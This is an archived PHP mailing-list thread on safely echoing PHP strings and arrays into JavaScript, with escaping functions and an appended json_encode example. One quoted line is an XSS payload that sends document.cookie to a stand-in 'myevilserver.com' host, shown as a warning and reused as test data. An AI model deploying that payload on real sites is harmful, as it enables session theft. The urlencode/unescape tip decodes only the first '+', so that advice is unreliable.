[nycphp-talk] Passing JavaScript arrays
Peter Sawczynec
ps at pswebcode.com
Sat Jul 8 08:25:06 EDT 2006
Another possible basic technique for the PHP to JavaScript string data
transfer.
Once, when creating a JavaScripted slideshow that rewrote the innerHTML in
div tags to change images and their complex multi-line descriptions, I found
this ditty worked for dynamically creating the JavaScript array of
image/text/HTML data.
1) In PHP do: urlencode($str_with_HTML_and_special_chars)
2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')
Has not choked on anything.
Warmest regards,
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com
-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On
Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays
Thanks to all for the great responses -- very helpful. I've summarized
below:
> For security, do I just escape the output like any other variable
> destined for the browser?
It depends where it's coming from and what you're using it for. For example,
I have dynamic JS arrays coming from the DB that may contain HTML, and will
eventually populate drop-down menus. For these, I pass through a 'js
cleansing' routine to trim, remove HTML tags, convert to UTF-8 (or
whatever), remove any line-breaks and escape all quotes. But I'd be
extremely wary if your JS data is coming from GET or POST. I can see a
variable like the following jacking a JS array:
'); location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//
If you're echoing a string from php into a javascript string var, you need
to escape it. Here's an example. The escapeString function here is slightly
modified from the one used in CakePHP's javascript helper:
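<?php
// Escape a PHP string for use inside a quoted JavaScript string literal.
function escapeString($string) {
    // Backslash goes first: str_replace() applies the pairs in order, so the
    // backslashes added by the later pairs are not escaped a second time.
    $escape = array('\\' => '\\\\', "\r\n" => '\n', "\r" => '\n', "\n" => '\n',
                    '"' => '\"', "'" => "\\'");
    return str_replace(array_keys($escape), array_values($escape), $string);
}
$string = "It's good to \"escape\" strings";
?>
<script language="javascript" type="text/javascript">
// <![CDATA[
var string = '<?php echo escapeString($string); ?>';
alert(string);
// ]]>
</script>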
If you don't want the JS to be inline, you can create a separate PHP file
that only outputs JavaScript code:
<script type="text/javascript" src="js.php"></script>
Just make sure js.php has the following before you start outputting
JavaScript:
header('content-type:text/javascript');
(From what I understand, Apache will by default cache .js files but force a
request for .php templates. This may affect the chi of your app.. man..)
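
An added example, not part of the thread and not CakePHP's code: one way to hand a whole PHP array to an inline script is to let json_encode() produce the JavaScript literal, with the HEX flags covering the quote, tag and ampersand characters that a hand-written replace table has to list one by one. The names jsLiteral() and $slides and the sample data are constructed for illustration; JSON_THROW_ON_ERROR assumes PHP 7.3 or later.

```php
<?php
// Added example: encode PHP data as a JavaScript literal for an inline <script>.
// jsLiteral() and $slides are illustrative names; the sample data is constructed.

function jsLiteral($value): string
{
    // JSON is valid JavaScript literal syntax. The HEX flags turn < > & ' and "
    // inside string values into \uXXXX escapes, so the output cannot close the
    // <script> element, open an HTML comment, or end a quoted JS string.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed slideshow rows, including the breakout string quoted in the thread.
$slides = [
    ['img' => 'a.jpg', 'text' => "Line one\r\nLine \"two\" with <b>HTML</b>"],
    ['img' => 'b.jpg', 'text' => "'); location='http://myevilserver.com/steal?your_cookies='+document.cookie; //"],
    ['img' => 'c.jpg', 'text' => 'ends with a backslash \\'],
    ['img' => 'd.jpg', 'text' => '</script><script>alert(1)</script>'],
];

$literal = jsLiteral($slides);

// None of the characters that matter to the HTML or JS parser survive raw.
// (The double quotes left in $literal are JSON's own string delimiters.)
foreach (['<', '>', '&', "'", "\r", "\n"] as $ch) {
    if (strpos($literal, $ch) !== false) {
        throw new RuntimeException('unescaped character in literal');
    }
}

// The data itself is unchanged: decoding returns the original array.
if (json_decode($literal, true) !== $slides) {
    throw new RuntimeException('round trip failed');
}
?>
<script type="text/javascript">
var slides = <?php echo $literal; ?>;
</script>
```

The literal is emitted without surrounding quotes because json_encode() supplies its own; values written into the page later with innerHTML still need HTML escaping at that point.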